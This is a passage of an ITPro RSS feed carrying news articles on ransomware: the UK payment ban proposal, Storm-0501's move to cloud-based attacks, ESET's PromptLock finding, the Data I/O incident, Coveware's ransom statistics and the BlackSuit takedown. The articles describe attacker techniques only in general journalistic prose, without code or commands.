Mandatory reporting for organizations outside the ban was supported by 63%.</p><h2 id="unintended-consequences">Unintended consequences</h2><p>The question, though, is whether the measures can achieve their intended results or might cause wider security problems.</p><p>“The banning of ransomware payments by UK public bodies and formalizing of ransomware reporting will have a positive impact,” Chris Atkinson, cyber security expert at PA Consulting, told <em>ITPro</em>.</p><p>“It will help disrupt cyber criminals and give UK authorities even greater visibility of the problem. It will not be the end of ransomware though, <a href="https://www.itpro.com/security/ransomware/the-ransomware-boom-shows-no-signs-of-letting-up-and-these-groups-are-causing-the-most-chaos">ransomware as a service (RaaS)</a> will continue and – at least in the near term – be displaced to other sectors. These sectors are already facing cyber-attacks, but these could increase.”</p><p>This, and other unintended consequences, are causing concern among cybersecurity experts.</p><p>As Atkinson suggests, criminal groups might simply switch their attention away from public sector bodies to those that do not fall under the proposed new rules.</p><p>“The intent is to remove financial incentives from targeting public sector and CNI organizations and reduce the profitability of ransomware,” he explains. 
“This is a good thing but will likely lead to displacement of ransomware attacks to other sectors not covered by the ban – though no sector has been safe so far.”</p><p>As recent <a href="https://www.itpro.com/security/cyber-attacks/cyber-attacks-on-uk-retailers-financial-impact">ransomware attacks against the retail sector</a> show, cybercriminals are adept at finding weak spots.</p><p>Public sector organizations, including parts of the NHS and education, were being targeted because their cybersecurity measures are relatively weak. Much of this is down to resource constraints, and the need to support older technology.</p><p>But Atkinson warns that ransomware is not the only way attackers make money, so any payment ban can only be a partial solution. “<a href="https://www.itpro.com/security/ai-powered-banking-fraud-on-the-rise-but-financial-institutions-are-fighting-back">Fraud</a>, theft, and money laundering will continue to be incentives to cyber criminals,” he says. And the public sector will still be vulnerable to those other forms of attacks, especially if funding for security measures remains tight.</p><p>“There's a couple different ways this could go,” Crystal Morin, cybersecurity strategist at Sysdig, tells <em>ITPro</em>.</p><p>“It depends on who the attacker is and what they want to gain. They could continue to target the public sector and government because they may be ill-prepared and slow to respond. They may know that they’re not going to receive payment, but they’re going to be able to take down a network, or obtain public information or government data.”</p><p>This, she suggests, could be sold on the <a href="https://www.itpro.com/security/32117/what-is-the-dark-web"><u>dark web</u></a>, passed on to <a href="https://www.itpro.com/security/cyber-attacks/state-sponsored-cyber-attacks-the-new-frontier"><u>nation state adversaries</u></a>, or used by crime groups for other purposes such as extortion. 
So a ransomware ban will certainly not remove the need for public sector bodies to invest in security.</p><p>“You have to <a href="https://www.itpro.com/security/cyber-attacks/all-us-forces-must-now-assume-their-networks-are-compromised-after-salt-typhoon-breach"><u>assume there is someone in your environment</u></a>, especially in the public sector or critical national infrastructure,” she says.</p><h2 id="facts-on-the-ground">Facts on the ground</h2><p>Nonetheless, there is growing interest in ransomware payment bans.</p><p>The UK's proposal to ban ransomware payments is by no means the only measure governments are taking to counter ransomware attacks. What sets the UK proposals apart is that the plans will have the backing of the law.</p><p>Most other measures, at least so far, are voluntary. One example is the <a href="https://counter-ransomware.org/aboutus"><u>International Counter Ransomware Initiative</u></a>, a US-led alliance of 40 countries. Launched some two years ago, the initiative's signatories include the UK, Canada, India, and almost every EU member state, all of which pledged not to pay ransoms. And law enforcement agencies, such as the FBI, strongly discourage ransom payments.</p><p>There is also the possibility, in the US and elsewhere, of prosecution under existing counter-terrorism, organised crime, and sanctions legislation.</p><p>But as Stephen Boyer, chief innovation officer at cybersecurity firm Bitsight, points out, there have not yet been any documented cases of the threat being carried through. “I’ve not seen it yet, though [payment] is strongly discouraged,” he tells <em>ITPro</em>. But the risks of penalties are there.</p><p>He adds that alongside evidence that public sector bodies are moving away from ransomware payments, internal bans have long been the case at many controlled organizations. The UK government already has a policy of not paying ransoms. 
“The UK public sector hasn’t really been paying, so this is not a huge deviation,” he says.</p><p>The proposals will extend the non-payment rule to CNI and publicly funded “arms-length bodies”, but Boyer, at least, expects centralized reporting to have more of an impact on countering ransomware.</p><p>At the same time, ransomware payment bans could have other impacts. As well as pushing ransomware groups to target other sectors, it ties the hands of public sector bodies' <a href="https://www.itpro.com/business/business-strategy/why-the-ciso-role-is-so-demanding-and-how-leaders-can-help"><u>CISOs</u></a> when their organizations are attacked.</p><p>The brutal truth is that organizations <a href="https://www.itpro.com/security/ransomware/75-percent-of-uk-business-leaders-are-willing-to-risk-criminal-penalties-to-pay-ransoms"><u>often pay ransoms</u></a> because it’s cheaper and less disruptive than recovery. As Boyer points out, no one wants to fund criminal groups. But there are documented cases where public authorities have paid substantially more in remediation than the original ransom.</p><p>“Full prohibition with no exceptions means you are not allowed to make a real risk trade off,” he says. And ransomware groups are adept at setting ransoms at a level victims are willing to pay. “They are very strategic in what they charge.”</p><p>The ransom payment ban could, as the UK government hopes, disrupt the business model of cybercrime. But it's likely to come at a cost.</p>
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
                                <item>
                                                            <title><![CDATA[ A notorious hacker group is ramping up cloud-based ransomware attacks ]]></title>
                                                                                                                                                                                                <link>https://www.itpro.com/security/ransomware/a-notorious-hacker-group-is-ramping-up-cloud-based-ransomware-attacks</link>
                                                                            <description>
                            <![CDATA[ The Storm-0501 threat group is refining its tactics, according to Microsoft, shifting away from traditional endpoint-based attacks and toward cloud-based ransomware. ]]>
                                                                                                            </description>
                                                                                                                                <guid isPermaLink="false">3TKoyoPGVcaX3oUU6yqhgG</guid>
                                                                                                <enclosure url="https://cdn.mos.cms.futurecdn.net/LrXBU2G7X45b6NeaQsxQsN-1280-80.jpg" type="image/jpeg" length="0"></enclosure>
                                                                        <pubDate>Thu, 28 Aug 2025 11:20:00 +0000</pubDate>                                                                                                                                                                                                                                <category><![CDATA[Ransomware]]></category>
                                                    <category><![CDATA[Security]]></category>
                                                                                                                    <dc:creator><![CDATA[ Emma Woollacott ]]></dc:creator>                                                                <dc:description><![CDATA[ https://cdn.mos.cms.futurecdn.net/aWfskavxoVSMDy6cDWtYmJ.jpg ]]></dc:description>
                                                                                                                                                                                                                                                <media:content type="image/jpeg" url="https://cdn.mos.cms.futurecdn.net/LrXBU2G7X45b6NeaQsxQsN-1280-80.jpg">
                                                            <media:credit><![CDATA[Getty Images]]></media:credit>
                                                                                                                                                                                                                                    <media:description><![CDATA[Ransomware concept image showing a warning symbol in red with binary code in background.]]></media:description>                                                            <media:text><![CDATA[Ransomware concept image showing a warning symbol in red with binary code in background.]]></media:text>
                                <media:title type="plain"><![CDATA[Ransomware concept image showing a warning symbol in red with binary code in background.]]></media:title>
                                                    </media:content>
                                                    <media:thumbnail url="https://cdn.mos.cms.futurecdn.net/LrXBU2G7X45b6NeaQsxQsN-1280-80.jpg" />
                                                                                                                                                                    <content:encoded >
                            <![CDATA[
                            <article>
                                <p>The Storm-0501 threat group is refining its tactics, according to Microsoft, shifting away from traditional endpoint-based attacks and toward cloud-based ransomware.</p><p>By leveraging cloud-native capabilities, <a href="https://www.microsoft.com/en-us/security/blog/2025/08/27/storm-0501s-evolving-techniques-lead-to-cloud-based-ransomware/"><u>analysis</u></a> from the tech giant shows Storm-0501 exfiltrates large volumes of data, destroys data and backups within the victim environment, and demands ransom — all at speed and without relying on traditional <a href="https://www.itpro.com/malware/28076/what-is-malware">malware</a> deployment.</p><p>This time last year, Microsoft warned that <a href="https://www.itpro.com/cloud/cloud-security/hybrid-cloud-environments-are-under-serious-threat-from-hackers-heres-what-you-need-to-know">Storm-0501 had extended its on-premises ransomware operations</a> into <a href="https://www.itpro.com/hybrid-cloud/29668/what-is-hybrid-cloud">hybrid cloud</a> environments. </p><p>The group has been shown to have compromised Active Directory environments before pivoting to Microsoft Entra ID, escalating privileges on hybrid and cloud identities to gain global administrator privileges. </p><p>"Storm-0501 has continued to demonstrate proficiency in moving between on-premises and cloud environments, exemplifying how threat actors adapt as hybrid cloud adoption grows," said the Microsoft Threat Intelligence team. </p><p>"They hunt for unmanaged devices and security gaps in hybrid cloud environments to evade detection and escalate cloud privileges and, in some cases, traverse tenants in multi-tenant setups to achieve their goals."</p><h2 id="how-storm-0501-operates">How Storm-0501 operates</h2><p>Microsoft gives the example of one recent campaign in which Storm-0501 compromised a large enterprise composed of multiple subsidiaries. 
Each operated its own <a href="https://www.itpro.com/business/the-future-of-business/modernize-active-directory-break-free-from-the-limitations-of-ad">Active Directory</a> domain, all interconnected through domain trust relationships and enabling cross-domain authentication and resource access.</p><p>However, only one tenant had Microsoft Defender for Endpoint deployed, and devices from multiple Active Directory domains were onboarded to this single tenant’s license, creating visibility gaps across the environment.</p><p>Storm-0501 checked for the presence of Defender for Endpoint services, suggesting a deliberate effort to avoid detection by targeting non-onboarded systems, Microsoft said. </p><p>Lateral movement was facilitated using Evil-WinRM, a post-exploitation tool that utilizes PowerShell over <a href="https://www.itpro.com/mobile/remote-access/368102/how-to-remote-desktop-into-ubuntu">Windows Remote Management</a> (WinRM) for remote code execution. </p><p>Commands were executed over sessions initiated with Evil-WinRM, as well as discovery using other common native Windows tools and commands such as quser.exe and net.exe. </p><p>Earlier in the attack, Storm-0501 had compromised an Entra Connect Sync server that was not onboarded to Defender for Endpoint - and which Microsoft reckons was used as a pivot point, with the group establishing a tunnel to move laterally within the network.</p><p>It also carried out a DCSync attack, abusing the Directory Replication Service (DRS) Remote Protocol to simulate the behavior of a domain controller - allowing it to request password hashes for any user in the domain, including privileged accounts.</p><p>It then pivoted to the cloud, leveraging the Entra Connect Sync Directory Synchronization Account (DSA) to enumerate users, roles, and Azure resources within the tenant using AzureHound.</p><p>"Shortly thereafter, the threat actor attempted to sign in as several privileged users. 
These attempts were unsuccessful, blocked by Conditional Access policies and <a href="https://www.itpro.com/security/cyber-security/369745/what-is-mfa-fatigue">multi-factor authentication (MFA)</a> requirements," said the team.</p><p>"This suggests that while Storm-0501 had valid credentials, they lacked the necessary second factor or were unable to satisfy policy conditions."</p><p>In response, Storm-0501 shifted tactics, traversing between Active Directory domains and eventually moving laterally to compromise a second Entra Connect server and identify an admin identity that didn't have MFA enabled - allowing it to assign a new password.</p><p>"From the point that the threat actor was able to successfully meet the Conditional Access policies and sign in to the Azure portal as a Global Admin account, Storm-0501 essentially achieved full control over the cloud domain," researchers said. </p><p>"The threat actor then utilized the highest possible cloud privileges to obtain their goals in the cloud."</p>
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
                                <item>
                                                            <title><![CDATA[ Security researchers have just identified what could be the first ‘AI-powered’ ransomware strain – and it uses OpenAI’s gpt-oss-20b model ]]></title>
                                                                                                                                                                                                <link>https://www.itpro.com/security/ransomware/security-researchers-have-just-identified-what-could-be-the-first-ai-powered-ransomware-strain-and-it-uses-openais-gpt-oss-20b-model</link>
                                                                            <description>
                            <![CDATA[ Using OpenAI's gpt-oss:20b model, ‘PromptLock’ generates malicious Lua scripts via the Ollama API. ]]>
                                                                                                            </description>
                                                                                                                                <guid isPermaLink="false">pyVt8viTWFAveREZ3Qjvjf</guid>
                                                                                                <enclosure url="https://cdn.mos.cms.futurecdn.net/SDJ7bts4q7L4Ni743DoLPD-1280-80.jpg" type="image/jpeg" length="0"></enclosure>
                                                                        <pubDate>Wed, 27 Aug 2025 10:14:24 +0000</pubDate>                                                                                                                                <updated>Wed, 27 Aug 2025 10:14:53 +0000</updated>
                                                                                                                                            <category><![CDATA[Ransomware]]></category>
                                                    <category><![CDATA[Security]]></category>
                                                                                                                    <dc:creator><![CDATA[ Emma Woollacott ]]></dc:creator>                                                                <dc:description><![CDATA[ https://cdn.mos.cms.futurecdn.net/aWfskavxoVSMDy6cDWtYmJ.jpg ]]></dc:description>
                                                                                                                                                                                                                                                <media:content type="image/jpeg" url="https://cdn.mos.cms.futurecdn.net/SDJ7bts4q7L4Ni743DoLPD-1280-80.jpg">
                                                            <media:credit><![CDATA[Getty Images]]></media:credit>
                                                                                                                                                                                                                                    <media:description><![CDATA[AI ransomware and cyber crime concept image showing a digitized human eye observing networks with computer code.]]></media:description>                                                            <media:text><![CDATA[AI ransomware and cyber crime concept image showing a digitized human eye observing networks with computer code.]]></media:text>
                                <media:title type="plain"><![CDATA[AI ransomware and cyber crime concept image showing a digitized human eye observing networks with computer code.]]></media:title>
                                                    </media:content>
                                                    <media:thumbnail url="https://cdn.mos.cms.futurecdn.net/SDJ7bts4q7L4Ni743DoLPD-1280-80.jpg" />
                                                                                                                                                                    <content:encoded >
                            <![CDATA[
                            <article>
                                <p>Researchers at cybersecurity firm <a href="https://www.itpro.com/security/eset-looks-to-empower-partners-with-cybersecurity-portfolio-updates">ESET </a>have discovered what they said is the "first known AI-powered <a href="https://www.itpro.com/security/28084/what-is-ransomware">ransomware</a>" strain.</p><p>Dubbed ‘PromptLock’, researchers said it uses OpenAI's open source gpt-oss:20b model, released earlier this month, locally via the Ollama API to generate malicious Lua scripts on the fly, which it then executes.</p><p>"PromptLock leverages Lua scripts generated from hard-coded prompts to enumerate the local filesystem, inspect target files, exfiltrate selected data, and perform encryption," said researchers Anton Cherepanov and Peter Strycek in posts on several social media sites, including <a href="https://x.com/ESETresearch/status/1960365364300087724"><u>X</u></a>. </p><p>"These Lua scripts are cross-platform compatible, functioning on Windows, Linux, and macOS. Based on the detected user files, the malware may exfiltrate data, encrypt it, or potentially destroy it."</p><p>PromptLock is written in Golang and uses the SPECK 128-bit encryption algorithm, developed by the US National Security Agency (NSA), to encrypt files. 
It sends its requests through Ollama, an <a href="https://www.itpro.com/software/28109/what-is-open-source">open source</a> API for interfacing with large language models.</p><p>The <a href="https://www.itpro.com/strategy/28296/what-is-bitcoin">Bitcoin </a>address used in the AI prompt for a payment demand is the one associated with the cryptocurrency's creator, Satoshi Nakamoto, whose real identity has never been discovered.</p><p>Cherepanov and Strycek said they've identified both Windows and Linux variants uploaded to VirusTotal, a Google-owned service that catalogs malware and checks files for malicious threats.</p><p>The good news is that the <a href="https://www.itpro.com/malware/28076/what-is-malware">malware </a>doesn't seem to be fully functional yet - the destruction functionality hasn't been implemented.</p><p>"Although multiple indicators suggest the sample is a proof-of-concept (PoC) or work-in-progress rather than fully operational malware deployed in the wild, we believe it is our responsibility to inform the <a href="https://www.itpro.com/security/28133/what-is-cyber-security">cybersecurity </a>community about such developments," Cherepanov and Strycek said. </p><h2 id="concerns-rising-over-ai-ransomware-threats">Concerns rising over AI ransomware threats</h2><p>Ransomware gangs have increasingly been using AI to automate communications and enhance their social engineering techniques, research shows.</p><p>A recent study from Acronis <a href="https://www.acronis.com/en-us/resource-center/resource/acronis-cyberthreats-report-h1-2025/" target="_blank"><u>found</u></a> that the increase in the use of <a href="https://www.itpro.com/strategy/28181/what-is-ai">AI </a>by ransomware gangs appeared to be reflected in their chosen threat vectors. 
<a href="https://www.itpro.com/security/phishing/why-social-engineering-is-such-a-problem-and-how-your-business-can-protect-itself">Social engineering</a> and business email compromise (BEC) attacks increased from 20% to 25.6% in the first five months of 2025 compared to the same period in 2024. </p><p>This, researchers noted, was probably down to the growth in AI use for crafting convincing impersonations. </p><p>Earlier this year, Malwarebytes warned that businesses <a href="https://www.itpro.com/security/cyber-crime/agentic-ai-cybersecurity-risks">need to be prepared for AI-powered ransomware attacks</a>. </p><p>Up to now, AI agents have generally been used to increase the efficiency of attacks, rather than introducing new capabilities or altering the underlying tactics used by hackers. </p><p>According to Malwarebytes, though, this could all change soon as attackers use AI more broadly.</p><p>"We are in the earliest days of regular threat actors leveraging local/private AI," said John Scott-Railton, a spyware researcher at Citizen Lab, commenting on the ESET research. "And we are unprepared."</p><h3 class="article-body__section" id="section-more-from-itpro"><span>MORE FROM ITPRO</span></h3><ul><li><a href="https://www.itpro.com/technology/artificial-intelligence/mandiant-says-generative-ai-will-empower-new-breed-of-information-operations-social-engineering">Mandiant says generative AI will empower new breed of information operations, social engineering</a></li><li><a href="https://www.itpro.com/security/data-breaches/ai-breaches-arent-just-a-scare-story-any-more-theyre-happening-in-real-life">AI breaches aren’t just a scare story any more – they’re happening in real life</a></li><li><a href="https://www.itpro.com/security/cyber-attacks/think-ddos-attacks-are-bad-now-wait-until-hackers-start-using-ai-assistants-to-coordinate-attacks-researchers-warn">Think DDoS attacks are bad now? Wait until hackers start using AI assistants to coordinate attacks</a></li></ul>
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
                                <item>
                                                            <title><![CDATA[ Data I/O shuts down systems in wake of ransomware attack ]]></title>
                                                                                                                                                                                                <link>https://www.itpro.com/security/ransomware/data-i-o-shuts-down-systems-in-wake-of-ransomware-attack</link>
                                                                            <description>
                            <![CDATA[ Regulatory filings by Data I/O suggest the costs of dealing with the attack could be significant ]]>
                                                                                                            </description>
                                                                                                                                <guid isPermaLink="false">qnyyeWtzpti4PvLnbXy7AJ</guid>
                                                                                                <enclosure url="https://cdn.mos.cms.futurecdn.net/LrXBU2G7X45b6NeaQsxQsN-1280-80.jpg" type="image/jpeg" length="0"></enclosure>
                                                                        <pubDate>Tue, 26 Aug 2025 09:39:13 +0000</pubDate>                                                                                                                                <updated>Tue, 26 Aug 2025 09:39:42 +0000</updated>
                                                                                                                                            <category><![CDATA[Ransomware]]></category>
                                                    <category><![CDATA[Security]]></category>
                                                                                                                    <dc:creator><![CDATA[ Emma Woollacott ]]></dc:creator>                                                                <dc:description><![CDATA[ https://cdn.mos.cms.futurecdn.net/aWfskavxoVSMDy6cDWtYmJ.jpg ]]></dc:description>
                                                                                                                                                                                                                                                <media:content type="image/jpeg" url="https://cdn.mos.cms.futurecdn.net/LrXBU2G7X45b6NeaQsxQsN-1280-80.jpg">
                                                            <media:credit><![CDATA[Getty Images]]></media:credit>
                                                                                                                                                                                                                                    <media:description><![CDATA[Ransomware concept image showing a warning symbol in red with binary code in background.]]></media:description>                                                            <media:text><![CDATA[Ransomware concept image showing a warning symbol in red with binary code in background.]]></media:text>
                                <media:title type="plain"><![CDATA[Ransomware concept image showing a warning symbol in red with binary code in background.]]></media:title>
                                                    </media:content>
                                                    <media:thumbnail url="https://cdn.mos.cms.futurecdn.net/LrXBU2G7X45b6NeaQsxQsN-1280-80.jpg" />
                                                                                                                                                                    <content:encoded >
                            <![CDATA[
                            <article>
                                <p>Electronics manufacturer Data I/O has reported a <a href="https://www.itpro.com/security/28084/what-is-ransomware">ransomware</a> attack that took place earlier this month.</p><p><a href="https://www.sec.gov/ix?doc=/Archives/edgar/data/0000351998/000165495425009925/daio_8k.htm" target="_blank"><u>Regulatory filings</u></a> from the firm show it detected a breach of internal IT systems on 6th August.</p><p>"Upon discovery, the Company promptly activated its response protocols, took steps to secure its global IT systems and implemented containment measures, including proactively taking certain platforms offline and implementing other mitigation measures," it said. </p><p>"The Company also engaged leading cybersecurity experts to support the IT system recovery and conduct a comprehensive investigation," Data I/O added. </p><p>"Based on the findings, the Company will take additional actions as appropriate, including notifying affected individuals and regulatory authorities in compliance with applicable laws."</p><p>According to Data I/O, containment activities have hit IT systems relating to internal and external communications, shipping, receiving, manufacturing production, and various other support functions.</p><p>The company hasn't revealed whether it's received a <a href="https://www.itpro.com/security/ransomware/362729/uk-businesses-most-likely-pay-ransomware-demands">ransomware demand</a>. It also said there doesn't appear to have been any significant impact on the company’s business operations. </p><p>However, Data I/O said it's likely that costs related to the incident, including fees for cybersecurity experts and other advisors, along with the cost of restoring any impacted systems, could have a material impact on its financial results. 
</p><h2 id="data-i-o-attack-culprits-still-at-large">Data I/O attack culprits still at large</h2><p>Data I/O produces electronic device programming systems for integrated circuits, such as flash memory and microcontrollers, with customers including Tesla, Bosch, Amazon, Apple, Google, HP, Microsoft, Siemens, Philips, Sony, and Foxconn. </p><p>Around two-thirds of its business currently comes from automotive electronic production, including technology for electric car charging stations. It claims it serves 18 of the world's top 20 automotive electronics suppliers.</p><p>Pete Luban, Field CISO at AttackIQ, said that, given the domain Data I/O works in, it represents a prime target for threat actors. </p><p>"Ransomware attacks on manufacturers can have rippling effects down supply chains, especially with Data I/O’s major customers including industry giants like Tesla, Panasonic, Amazon, Google, and Microsoft," he said.</p><p>"Manufacturers should use this case as a lesson to enact proactive security measures to mitigate <a href="https://www.itpro.com/security/ransomware/encryption-less-ransomware-warning-issued-over-emerging-attack-method-for-threat-actors">ransomware threats</a> before they’re able to shut down critical systems."</p><p>Luban added that security teams should use adversarial emulation to test their defenses against baseline behaviors associated with common ransomware groups: </p><p>"This way, organizations can shut off access to sensitive systems and information and keep supply chains intact," he said.</p><p>No group has yet claimed responsibility for the attack. 
However, <a href="https://www.itpro.com/security/cyber-crime/scattered-spider-group-marks-and-spencer">Scattered Spider</a> or <a href="https://www.itpro.com/security/cyber-attacks/google-cyber-researchers-were-tracking-the-shinyhunters-groups-salesforce-attacks-then-realized-theyd-fallen-victim">ShinyHunters</a> are likely suspects.</p><p>"Given the geopolitics surrounding the chip industry and its high-profile customers, Data I/O is an attractive target for cyber criminals. With shipping delayed, the attack affects not only Data I/O but also the tech giants that rely on their chips to build their products," said Trevor Dearing, director of critical infrastructure at Illumio.</p><p>"By hitting critical systems, attackers drive faster payouts and cause deeper damage than traditional data breaches ever did. Ransomware now brings massive downtime, reputational harm, and financial loss."</p><h3 class="article-body__section" id="section-more-from-itpro"><span>MORE FROM ITPRO</span></h3><ul><li><a href="https://www.itpro.com/security/ransomware/ransomware-victims-are-getting-better-at-haggling-with-hackers">Ransomware victims are getting better at haggling with hackers</a></li><li><a href="https://www.itpro.com/security/ransomware/new-ransomware-groups-worrying-security-researchers">The ransomware groups worrying security researchers in 2025</a></li><li><a href="https://www.itpro.com/security/ransomware/aeza-group-ransomware-hosting-us-sanctions">A major ransomware hosting provider just got hit with US sanctions</a></li></ul>
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
                                <item>
                                                            <title><![CDATA[ Average ransom payment doubles in a single quarter  ]]></title>
                                                                                                                                                                                                <link>https://www.itpro.com/security/ransomware/average-ransom-payment-doubles-in-a-single-quarter</link>
                                                                            <description>
                            <![CDATA[ Targeted social engineering and data exfiltration have become the biggest tactics as three major ransomware groups dominate ]]>
                                                                                                            </description>
                                                                                                                                <guid isPermaLink="false">sNHZRNKdk9gF3ueWkzroKQ</guid>
                                                                                                <enclosure url="https://cdn.mos.cms.futurecdn.net/dyefxvMjRzV26cLHKKchw3-1280-80.jpg" type="image/jpeg" length="0"></enclosure>
                                                                        <pubDate>Thu, 14 Aug 2025 07:30:00 +0000</pubDate>                                                                                                                                <updated>Thu, 14 Aug 2025 09:21:28 +0000</updated>
                                                                                                                                            <category><![CDATA[Ransomware]]></category>
                                                    <category><![CDATA[Security]]></category>
                                                                                                                    <dc:creator><![CDATA[ Emma Woollacott ]]></dc:creator>                                                                <dc:description><![CDATA[ https://cdn.mos.cms.futurecdn.net/aWfskavxoVSMDy6cDWtYmJ.jpg ]]></dc:description>
                                                                                                                                                                                                                                                <media:content type="image/jpeg" url="https://cdn.mos.cms.futurecdn.net/dyefxvMjRzV26cLHKKchw3-1280-80.jpg">
                                                            <media:credit><![CDATA[Getty Images]]></media:credit>
                                                                                                                                                                                                                                    <media:description><![CDATA[Ransomware concept image showing a yellow-colored alert symbol pictured against a jet black background.]]></media:description>                                                            <media:text><![CDATA[Ransomware concept image showing a yellow-colored alert symbol pictured against a jet black background.]]></media:text>
                                <media:title type="plain"><![CDATA[Ransomware concept image showing a yellow-colored alert symbol pictured against a jet black background.]]></media:title>
                                                    </media:content>
                                                    <media:thumbnail url="https://cdn.mos.cms.futurecdn.net/dyefxvMjRzV26cLHKKchw3-1280-80.jpg" />
                                                                                                                                                                    <content:encoded >
                            <![CDATA[
                            <article>
                                <p>Ransom payouts hit record levels this quarter, thanks to a dramatic rise in targeted social engineering attacks.</p><p><a href="https://www.coveware.com/blog/2025/7/21/targeted-social-engineering-is-en-vogue-as-ransom-payment-sizes-increase#vectors" target="_blank">Analysis from Coveware by Veeam</a> showed that the average ransom payment rocketed to $1.13 million - up 104% from the first quarter. The median payment rose by a similar amount, doubling to $400,000.</p><p>This surge was largely down to an increase in payments by larger organizations hit by data exfiltration-only incidents. </p><p>The study noted that data theft has now overtaken encryption as the primary extortion method, with exfiltration a factor in 74% of all cases. Meanwhile, multi-extortion tactics and delayed threats are on the rise.</p><p>"The second quarter of 2025 marks a turning point in ransomware, as targeted social engineering and data exfiltration have become the dominant playbook,” said Bill Siegel, CEO of Coveware by Veeam. 
</p><p>“Attackers aren’t just after your backups – they’re after your people, your processes, and your data’s reputation."</p><p>The quarter’s top ransomware variants were Akira (19%), Qilin (13%), and Lone Wolf (9%), while Silent Ransom and Shiny Hunters entered the top five for the first time.</p><h2 id="ransomware-groups-target-precision">Ransomware groups target precision</h2><p>The biggest threats involved social engineering attacks from three major ransomware groups – Scattered Spider, Silent Ransom, and Shiny Hunters.</p><p>These groups have now abandoned mass opportunistic attacks for precision strikes, using new impersonation tactics against help desks, employees and third-party service providers.</p><p>They regularly exploit vulnerabilities in widely-used platforms such as Ivanti, Fortinet, VMware and Windows services, often right after a vulnerability has been publicly disclosed.</p><p>Meanwhile, 'lone wolf' attacks by extortionists using generic, unbranded toolkits are on the rise, allowing even mid-tier actors to breach enterprise infrastructure.</p><h2 id="insider-threats-escalate">Insider threats escalate</h2><p>Insider and third-party access risks showed an uptick in the quarter, particularly involving business process outsourcing (BPO) partners, contractors, and IT service providers. </p><p>"These external parties often hold privileged access but operate outside core security oversight, making them a growing vector of exploitation for credential misuse or social engineering," the researchers point out.</p><p>The worst-hit industry sector was professional services at 20%, followed by healthcare and consumer services at 14% each. 
</p><p>Mid-sized companies with between 11 and 1,000 employees made up 64% of victims - a sweet spot, researchers noted, for attackers balancing payout potential against less mature defenses.</p><p>Before exfiltrating or encrypting data, attackers are putting effort into mapping networks, enumerating assets and identifying the most valuable systems or datasets. This reconnaissance phase often relies on legitimate admin tools or built-in OS commands, making it hard to spot without contextual analysis.</p><p>If it can be detected, though, whether by monitoring for anomalous enumeration or by deploying deception technologies such as decoy credentials, honeyfiles or fake infrastructure, this phase can serve as an early warning.</p><p>"Organizations must prioritize employee awareness, harden identity controls, and treat data exfiltration as an urgent risk, not an afterthought," advised Siegel.</p><h3 class="article-body__section" id="section-more-from-itpro"><span>MORE FROM ITPRO</span></h3><ul><li><a href="https://www.itpro.com/security/ransomware/aeza-group-ransomware-hosting-us-sanctions">A major ransomware hosting provider just got hit with US sanctions</a></li><li><a href="https://www.itpro.com/security/ransomware/ransomware-victims-are-getting-better-at-haggling-with-hackers">Ransomware victims are getting better at haggling with hackers</a></li><li><a href="https://www.itpro.com/security/ransomware/new-ransomware-groups-worrying-security-researchers">The new ransomware groups worrying security researchers in 2025</a></li></ul>
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
                                <item>
                                                            <title><![CDATA[ BlackSuit ransomware gang taken down in latest law enforcement sting – but members have already formed a new group  ]]></title>
                                                                                                                                                                                                <link>https://www.itpro.com/security/ransomware/blacksuit-ransomware-gang-taken-down-in-latest-law-enforcement-operation-but-members-have-already-formed-a-new-group</link>
                                                                            <description>
                            <![CDATA[ The notorious gang has seen its servers taken down and bitcoin seized, but may have morphed into a new group called Chaos ]]>
                                                                                                            </description>
                                                                                                                                <guid isPermaLink="false">gfn9EWomo5iXhUAEVfVGka</guid>
                                                                                                <enclosure url="https://cdn.mos.cms.futurecdn.net/mJfYyZvh8k5gkrArFsfHiX-1280-80.jpg" type="image/jpeg" length="0"></enclosure>
                                                                        <pubDate>Wed, 13 Aug 2025 09:59:37 +0000</pubDate>                                                                                                                                <updated>Wed, 13 Aug 2025 10:01:59 +0000</updated>
                                                                                                                                            <category><![CDATA[Ransomware]]></category>
                                                    <category><![CDATA[Security]]></category>
                                                                                                                    <dc:creator><![CDATA[ Emma Woollacott ]]></dc:creator>                                                                <dc:description><![CDATA[ https://cdn.mos.cms.futurecdn.net/aWfskavxoVSMDy6cDWtYmJ.jpg ]]></dc:description>
                                                                                                                                                                                                                                                <media:content type="image/jpeg" url="https://cdn.mos.cms.futurecdn.net/mJfYyZvh8k5gkrArFsfHiX-1280-80.jpg">
                                                            <media:credit><![CDATA[Getty Images]]></media:credit>
                                                                                                                                                                                                                                    <media:description><![CDATA[Ransomware concept image showing skull and cross bones on a computer chip sitting on a circuit board.]]></media:description>                                                            <media:text><![CDATA[Ransomware concept image showing skull and cross bones on a computer chip sitting on a circuit board.]]></media:text>
                                <media:title type="plain"><![CDATA[Ransomware concept image showing skull and cross bones on a computer chip sitting on a circuit board.]]></media:title>
                                                    </media:content>
                                                    <media:thumbnail url="https://cdn.mos.cms.futurecdn.net/mJfYyZvh8k5gkrArFsfHiX-1280-80.jpg" />
                                                                                                                                                                    <content:encoded >
                            <![CDATA[
                            <article>
                                <p>An international law enforcement operation has seized infrastructure used by the infamous BlackSuit ransomware gang, which is believed to have netted more than $370 million in ransom payments over the last three years.</p><p>Led by the US Department of Homeland Security, the operation also included the UK, Germany, Ireland, France, Canada, Ukraine, and Lithuania. </p><p>It resulted in the takedown of four servers and nine domains, and the seizure of more than $1 million in virtual currency.</p><p>“This operation strikes a critical blow to BlackSuit’s infrastructure and operations,” said William Mancino, special agent in charge of the US Secret Service’s Criminal Investigative Division.  </p><p>“The US Secret Service is committed to working alongside our law enforcement partners to dismantle criminal enterprises and prevent the deployment of malicious <a href="https://www.itpro.com/security/28084/what-is-ransomware">ransomware </a>that victimizes businesses and organizations.” </p><p>BlackSuit first started out as Quantum ransomware in January 2022 as a direct successor of the Conti group, but <a href="https://www.itpro.com/security/ransomware/the-royal-ransomware-group-has-rebranded-blacksuit-has-already-made-dollar500-million-in-ransom-demands-and-has-the-fbi-on-red-alert">rebranded as Royal ransomware</a> in September that year and then to BlackSuit in 2023.</p><p>The group is believed to have breached hundreds of organizations in sectors including critical manufacturing, government facilities, healthcare and public health, and commercial facilities. </p><p>One attack on the City of Dallas severely affected emergency services, the courts, and government. Another, against the blood plasma collection organization Octapharma, led to the temporary closure of almost 200 blood plasma collection centers across the country. </p><p>BlackSuit victims are usually required to pay ransoms in Bitcoin via a darknet website. 
